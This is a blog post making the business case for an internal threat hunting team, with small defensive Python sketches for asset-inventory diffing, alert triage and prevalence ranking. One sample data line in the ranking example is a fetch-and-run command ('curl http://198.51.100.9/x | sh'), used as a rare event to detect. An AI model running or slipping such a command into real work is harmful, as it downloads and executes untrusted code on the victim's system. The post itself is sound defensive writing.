The value-proposition of building and maintaining an internal Threat Hunting team…
2024-08-03 07:10:38 · Author: www.hexacorn.com

The IT/cyber Buy vs. Build discussions often present the issue at hand as a zero-sum game. And in this game you MUST choose between either ‘Buy’ or ‘Build’. How limiting…

TL;DR: This article suggests that you should both ‘Buy’ and continue to ‘Build’ security… then it tells you that you should hire an internal Threat Hunting team and make this team work on the following deliverables:

  • TI-driven checks
  • opportunistic analysis
  • systematic analysis
  • precursors to alerts/dashboards
  • SOC/Triage workflow improvements
  • shadow asset inventory
  • low/mid fidelity event escalation
  • help with data governance
  • identification and recommendations for new security controls
  • identification and understanding of new attack vectors, protocols, and new defenses

Let’s focus on that strategic bit first.

The ‘Buy’ is actually a very good friend of the ‘Build’, because it indicates progress. It is a milestone telling us that what used to be a whack-a-mole, makeshift/make-do, mundane process built out of necessity – ad hoc, not scalable, usually ‘designed’ (patched together) by that single, super smart person on the team, and as a result immediately subject to the classic ‘single point of failure’ problem – is now commoditized. And this is commoditization in its most democratized version: one that takes ownership of a problem in a manageable and effective way, and as a result frees up a lot of resources that can now be used to tackle many other problems… Plus, more junior people can be trained to work these solutions and enter the cybersecurity career path with minimal knowledge. Everyone wins.

Many cybersecurity solutions and services available today are pretty mature, but admittedly, and admirably, most were built on blood, sweat and tears. So… yes… be super-choosy, but buy as many as you can afford (of course, as long as you need them). And mind you, you do want to outsource as much cybersecurity work as you can today, because you still have a big chunk of other cyber work left to be done internally – and this is a type of work that cannot be outsourced (yet). Plus, the scope of this work expands very quickly, every day.

I will argue now that the term “Threat Hunting” is a misnomer.

Why?

The best deliverables of the Threat Hunting team are not necessarily ‘the threats we hunted down’ or ‘the breaches/ransomware events we have stopped’. Or, to speak the Agile enthusiasts’ language – ‘we closed 5 epics’ or ‘we killed 7 sprints’ (rolling eyes).

In my opinion the mature Threat Hunting team’s activity is far wider in scope, and I will try to cover it below…

Task #0: Detect and stop the BAD

Yeah, okay. All the mumbo jumbo about all the versions of the idealized threat hunting approaches one can take to find the BAD GUYS. Walk through the Mitre Att&ck, ingest open-source TI feeds, read and ingest data from Twitter/X, Reddit, Telegram, vendor feeds, look for DFIR-collected artifacts, IOCs, research and develop, you know what I mean… and don’t forget to HYPOTHESIZE… all these juicy bits we all hype about… Then find ways to detect data leaks, insider threats, over-employed individuals and people watching Netflix, identify individuals stashing pr0n, downloading keygenz, accessing their private stuff using a company device, and/or accessing company stuff using their private devices… and so on and so forth… one way or another exposing the company to incidents…

That’s a given.

Your ROI: you find the bad guys (ideally: EARLY). Congratz 😉

Task #1: Validate asset inventory data using your superior shadow asset inventory

The absolute nightmare of a task is to explain to any IT executive that we need to validate all the data they collect about assets… They will die on the hill of ‘we bought solution XYZ and it generates a decent asset inventory for us, so we don’t need anything else’.

Hang on…

Believe it or not, one of the most important tasks of an internal Threat Hunting team is to build an alternative and enriched version of the asset inventory – one that is built using the available logs. I call it a Shadow Asset Inventory. The Threat Hunting team should build it, the Threat Intelligence team should own it.

Trust me.

If executed properly, this initiative will go places… the most up-to-date list of devices, programs, IPs they connect to, packages, SBOM, you name it… All based on what we SEE in the logs. Updated/refreshed at least every 8h or so, to accommodate timezone changes, the follow-the-sun model, the activities of road warriors, devices added, devices decommissioned, devices/endpoints spawned and killed in the context of cloud tenants, devices seen by one security control but not another, and so on and so forth…

Having multiple instances/versions of asset inventories collected from the same environment using different approaches is actually a kind of cybersuperpower. Not only can you diff these asset collections, but you can also establish processes that rely on this regularly created diff to catch failures in many other processes – yes, including the ones that are actually responsible for building the MAIN IT asset inventories in the first place!
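The diff idea can be sketched in a few lines. This is a hypothetical illustration, not any specific product: the field names, hostnames, and the CMDB export format are all made up, and a real implementation would key on more than hostnames (MACs, serials, cloud instance IDs, etc.).

```python
# Sketch: diff a log-derived "shadow" asset inventory against the official
# CMDB export. All names and fields below are illustrative assumptions.

def shadow_inventory(log_events):
    """Collect every hostname seen in (already parsed) log events."""
    return {e["host"].lower() for e in log_events if e.get("host")}

def diff_inventories(cmdb_hosts, shadow_hosts):
    cmdb = {h.lower() for h in cmdb_hosts}
    return {
        "ghosts": sorted(cmdb - shadow_hosts),  # in CMDB, silent in logs
        "rogues": sorted(shadow_hosts - cmdb),  # alive in logs, unknown to CMDB
    }

events = [
    {"host": "web01", "event": "process_start"},
    {"host": "db02", "event": "logon"},
    {"host": "LAPTOP-X9", "event": "dns_query"},  # never registered in CMDB
]
delta = diff_inventories(["web01", "db02", "decom-old01"], shadow_inventory(events))
print(delta)  # {'ghosts': ['decom-old01'], 'rogues': ['laptop-x9']}
```

Run on a schedule (the 8h refresh mentioned above), the ‘ghosts’ list flags decommissioning/coverage failures and the ‘rogues’ list flags assets the IT process never captured.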

The ugly truth: IT departments rarely know what is ACTUALLY present in their environments. It’s not their fault. They rely on STATIC data. So we use all the available logs, with all their DYNAMIC data, to show them that they need to fix their processes…

Your ROI: Every single device, software, package, IP/domain accessed for production purposes, types of specific software (f.ex. RMM), types of installations (regular, portable), etc. can eventually be accounted for, even if late in the process. Answering Vulnerability Management questions like ‘Are we exposed?’ becomes much easier. And if we have to point out deficiencies in IT processes – IT departments should feel both happy and lucky – we actually have their backs!

Task #2: Support SOC by killing ‘stupid’

Your SOC/Triage function is most likely struggling. Today.

Why?

They have already been reorganized 20 times in the last 5 years, the managers are moving around, security controls keep being changed, and the priorities keep shifting… plus there is an extra layer of regulated markets to deal with… yeah… it’s a bit of a mess.

Let the Threat Hunting team walk in — they can look at all of the SOC alerts and the metrics – they can scrutinize the alerts, look at the security controls and/or queries that generate them, check and adjust assumptions, reconfigure, and in most cases — reduce the workload by as much as 40-60%!!!

I am not kidding!!!

I have done it a few times for a few different companies. The SOC queues are often overloaded and filled with ‘phishing’ or ‘pentesting query’ alerts coming in from internet-facing websites; and these ‘alerts’ are great examples of a detection mindset based on a rationale from 15 years ago. Today, if you are online (web site, S3 buckets, whatever), you will be scanned by many, all the time. Some scans are dodgy, some are legit. Business-wise, it would actually be worrisome not to see any scanning activity on your internet-facing web sites or other services. No matter what layer, you will see a lot of it today. We deal with it by… ignoring it. None of this is an actionable alert unless you see actual events of interest, f.ex. successful logons, webshell traffic, etc. Note: I am not just discarding them, I am assessing them from an ROI perspective. Your ROI may and probably will be different, so YMMV.
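The ‘ignore raw scanning, act on the follow-up’ idea above can be expressed as a simple correlation rule. A hedged sketch, with made-up event types and source IPs; a real pipeline would also bound the time window between the scan and the follow-up event.

```python
# Sketch: a scan alert is only escalated if the same source IP later
# produces an event of interest. Event type names are assumptions.
INTERESTING = {"successful_logon", "webshell_traffic", "file_upload"}

def escalate(scan_alerts, events):
    """Keep only scan alerts whose source also shows real impact."""
    hot_sources = {e["src"] for e in events if e["type"] in INTERESTING}
    return [a for a in scan_alerts if a["src"] in hot_sources]

scans = [{"src": "203.0.113.7"}, {"src": "198.51.100.9"}]
follow_ups = [{"src": "203.0.113.7", "type": "successful_logon"}]
print(escalate(scans, follow_ups))  # [{'src': '203.0.113.7'}]
```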

What I am signalling is, and this cannot be overstated — lots of ‘stupid’ SOC work comes from a BADLY MANAGED QUEUE.

While many SOC Analysts struggle to keep up with all this nonsense, you do need someone more senior and technical to step in and bring it all down to manageable levels. Walk through all the alerts one by one, talk to the team, understand the thought process behind the idea that led to creating these alerts in the first place, and then analyze procedures, highlight alerts that never generate TPs, consider enriching some of the data if possible, maybe use that enrichment for auto-closures, discuss moving some of the poorly performing detections to dashboards, etc.… and don’t be afraid to decommission some. There are a lot of options available, and a mature Threat Hunting team can help with all of that.
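The ‘highlight alerts that never generate TPs’ step lends itself to a quick pass over the closed-alert history. A minimal sketch, assuming each closed alert carries a rule name and an analyst verdict (field names and the volume threshold are illustrative):

```python
# Sketch: flag high-volume rules that have never produced a true positive
# as candidates for dashboards or decommissioning.
from collections import Counter

def rule_report(closed_alerts):
    """Per rule: (true positives, total alerts)."""
    totals, tps = Counter(), Counter()
    for a in closed_alerts:
        totals[a["rule"]] += 1
        if a["verdict"] == "TP":
            tps[a["rule"]] += 1
    return {r: (tps[r], totals[r]) for r in totals}

def decommission_candidates(closed_alerts, min_volume=100):
    report = rule_report(closed_alerts)
    return sorted(r for r, (tp, total) in report.items()
                  if tp == 0 and total >= min_volume)

history = ([{"rule": "web_scan", "verdict": "FP"}] * 250
           + [{"rule": "rare_parent_child", "verdict": "TP"}]
           + [{"rule": "rare_parent_child", "verdict": "FP"}] * 5)
print(decommission_candidates(history))  # ['web_scan']
```

The `min_volume` guard matters: a rule with zero TPs and three firings may simply be young, while a rule with zero TPs across hundreds of firings is pure queue pollution.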

Your ROI: Substantial SOC Workload reduction. SOC loves you and sees you as a trusted partner. The mutually beneficial relationship leads to less work for everyone, and more impact. Make your Threat Hunting team your Triage/L1 team’s best friend. Your management will love the new metrics. Some of the Triage/L1 analysts will become your apprentices.

Task #3: Hunt with the ORG in mind

There is this naive misconception that companies selling security tools benefit from access to BIG DATA. As one can imagine: they sit on this ‘uuuge stash of data, comb it for interesting stuff on a regular basis, and when they find anomalies – they immediately create detections.

This happens, and it does happen often. What may not be apparent is that the BIG DATA itself is not necessarily the best friend of the idea of finding BAD!

Yes, it does sound counter-intuitive, but let me explain.

The reason the AntiVirus idea kinda worked well in the past is accuracy – the majority of AV signatures were pretty much always hitting their targets with HIGH FIDELITY. When one victim was hit, AV companies would collect and analyze the malicious samples, add signatures, and then, at the cost of one child of Omelas, everyone else would end up protected.

The NextGen AV products introduced the idea of ‘maybe’ and the EDR products introduced the idea of ‘you are the captain now’ aka telemetry – suddenly we got access to all the nitty-gritty details of how your endpoints operate. File created? We know about it. Process executed? We know about it. This data is a gold mine.

But one org’s telemetry-driven gold mine is not necessarily a gold mine for the other.

With the emergence of evasion tactics, LOLBINs, and very wide access to telemetry from many environments, a few things became apparent pretty quickly:

  • It’s hard to alert on Low and Medium fidelity events in general; if you apply the Mitre Att&ck classification to all the events in the environment and make them ‘alertable’, you will end up alerting on a lot of FPs
  • A TP in one environment will be an FP in many others (think LOLBINs, but also “curl … | sh …” constructs that are usually bad, but often good as well); there are also many companies whose very hackish, 20/30-year-old processes are so entrenched that they ruin it all for everyone – the more modern ones use encoded PowerShell snippets, the more ancient ones use Office macros and VBA in ‘funny’ ways, often also relying on legacy tools like mshta and Visual Basic Script, or hiding genuine admin scripts with tools like AutoIt, WinBatch, PY2EXE, PS2EXE, PERL2EXE, etc. – I have seen enough of them to state very bluntly: ‘you MUST BE the captain now’ aka you need a TH team!
  • AI/ML/RBA approaches are promising, but we are far from them delivering the ‘binary decision’ output we need for alerting purposes
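One practical consequence of ‘a TP here is an FP there’ is to rank events by local prevalence instead of a global verdict: what is rare in *your* telemetry baseline is what deserves a look. A hedged sketch (the command lines and counts are invented for illustration):

```python
# Sketch of "you are the captain now": rank command lines by how rare
# they are in THIS environment, using your own telemetry as the baseline.
from collections import Counter

def build_baseline(command_lines):
    """Prevalence counts from historical telemetry."""
    return Counter(command_lines)

def rarest(baseline, candidates, top=3):
    """Lowest-prevalence candidates first: rare locally == worth a look."""
    return sorted(candidates, key=lambda c: baseline.get(c, 0))[:top]

baseline = build_baseline(
    ["powershell -enc AAA..."] * 500           # noisy, but normal *here*
    + ["mshta http://intranet/app.hta"] * 200  # legacy, also normal *here*
    + ["curl http://198.51.100.9/x | sh"]      # seen once: stands out
)
print(rarest(baseline, list(baseline), top=1))
# ['curl http://198.51.100.9/x | sh']
```

Note how the encoded PowerShell and the mshta launcher, both textbook ‘suspicious’ patterns globally, score as boring here, while the one-off `curl | sh` bubbles to the top. That is the localization argument in miniature.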

Your ROI: you are the captain now 🙂

Task #4: Qualify the log quality

Threat Hunting done right focuses on data a lot. We ask: what is available? What is the quality of this log feed? How can we use it for hunting? But also, on a more basic level: is it even coming in from all the devices, is it truncated and/or corrupted, is it parseable, is it actually properly parsed? Are the fields named correctly? Is it the full log or just a subset (any filters in place)? Is it actionable?
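Several of these questions can be answered mechanically. A minimal sketch of two such checks, parse rate and device coverage, assuming a JSON-lines feed with a `host` field (both assumptions; real feeds will need their own parsers and keys):

```python
# Sketch: basic log-feed health checks. Field names, the JSON-lines
# format, and the sample records are illustrative assumptions.
import json

def feed_health(raw_lines, expected_hosts):
    parsed, hosts = [], set()
    for line in raw_lines:
        try:
            rec = json.loads(line)
            parsed.append(rec)
            hosts.add(rec.get("host", "?"))
        except json.JSONDecodeError:
            pass  # truncated or corrupted line: counts against parse rate
    return {
        "parse_rate": round(len(parsed) / max(len(raw_lines), 1), 2),
        "missing_hosts": sorted(set(expected_hosts) - hosts),
    }

lines = ['{"host": "web01", "msg": "ok"}',
         '{"host": "db02", "msg": "ok"}',
         '{"host": "db02", "ms']  # truncated mid-record
print(feed_health(lines, ["web01", "db02", "app03"]))
# {'parse_rate': 0.67, 'missing_hosts': ['app03']}
```

A parse rate drifting below 1.0 or a growing `missing_hosts` list is exactly the kind of quiet data-governance failure that silently blinds every hunt downstream.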

Data governance is an important part of Threat Hunting done right.

A lot of data aggregation activities happen in limbo. Often driven by regulatory requirements, contractual agreements, legacy demands, etc., these feeds affect the overall quality of data. The Threat Hunting team can assess the usefulness of all these data feeds and suggest appropriate data ingestion policy changes. Killing terabytes of data coming in for no reason is a very good money-saving exercise!

Let me walk you through an example: a few years ago some regulatory requirements made us collect all IDS/IPS logs. Today such a requirement feels like it comes from a previous century – years of vendors adding ‘IDS/IPS detections’ have culminated in a flood of ‘detections’, and any alerts hitting on these logs simply can’t be actionable anymore. Some of these old rules still ‘catch’ requests associated with CVEs from 2001-2009… c’mon… Unless absolutely necessary, these logs can simply be disabled.
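To make the ‘lots of $$$ saved’ claim tangible, a back-of-the-envelope calculation helps when pitching the change. Every number below is invented: feed volumes and per-GB ingest pricing vary wildly between SIEM contracts.

```python
# Sketch: rough annual savings from dropping legacy IDS/IPS feeds.
# Feed names, GB/day rates, and the $/GB price are made-up assumptions.
LEGACY_FEEDS = {"ids_legacy": 800, "ids_web_2005": 300}  # GB/day per feed
COST_PER_GB = 0.10                                       # assumed SIEM ingest $/GB

daily_gb = sum(LEGACY_FEEDS.values())
annual_usd = daily_gb * COST_PER_GB * 365
print(f"~{daily_gb} GB/day dropped, ~${annual_usd:,.0f}/year saved")
# ~1100 GB/day dropped, ~$40,150/year saved
```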

Your ROI: less data, better quality of data, and… lots of $$$ saved!

Task #5: Identify and recommend new security controls, understand new protocols

The cybersecurity landscape is evolving very fast. It’s easy to get fixated on processing known events or intelligence sources.

But there is always more.

DNS over HTTPS/TLS (DoH, DoT) are hard to monitor. JavaScript code can be precompiled to V8 byte code. Email’s DKIM protocol may use DARA/DARN records. The Windows 11 ARM version is now a thing. So is the controversial Recall feature. The Event Tracing for Windows (ETW) technology continues to be enhanced. The SaaS attack matrix exists.

Your Threat Hunting team should be tasked with identifying these new technologies, protocols, ideas and bringing them up to the leadership so they can be at least added to the Risk Register.

Your ROI: your management is ‘in the know’, better street creds, and maybe a better budget next year?

Task #6: Apply ‘know-your-org’ principle to LOCALIZED hunting

The EDR solutions kinda spoiled us. Lots of events to look at, lots of juice.

BUT

It is highly possible that apart from these juicy EDR logs our internal teams have access to other solutions and logs. Many cloud and *aaS companies use proprietary code and generate proprietary logs, and only the internal TH team can access them, connect with the people who designed them, request changes/enhancements to the logs, and provide feedback that can be turned into a bug/feature request pretty quickly.

No external TH team can do this. They may claim they can, but in reality, it won’t work. If you have ever worked with external vendors, you know that they often work with multiple clients at the same time. Their incentive is not to dig into the unknown, but to recognize and close the known. This is not bad – you BUY and you cover a big chunk of the ‘known’. The rest is the cool stuff: the unknown, the weird, and the unpredictable. Your internal TH team will focus on that, and they will eventually build a process to convert these findings and research into a custom detection pipeline.

Your ROI: you cover all the bases; whatever the BUY can cover + whatever the BUILD can cover

The conclusion

The mature threat hunting team hunts for anomalies, gaps and imperfections in the areas of People, Process and Technology. It’s a company’s security Quality Assurance/Check function.

Such objectives place it pretty close to the concept of Red Teaming, seen as:

Red teams are sometimes associated with “contrarian thinking” and fighting groupthink, the tendency of groups to make and keep assumptions even in the face of evidence to the contrary.

When applied to intelligence work, red teaming is sometimes called alternative analysis. Alternative analysis involves bringing in fresh analysts to double-check the conclusions of another team, to challenge assumptions and make sure nothing was overlooked.


Source: https://www.hexacorn.com/blog/2024/08/02/the-value-proposition-of-building-and-maintaining-an-internal-threat-hunting-team/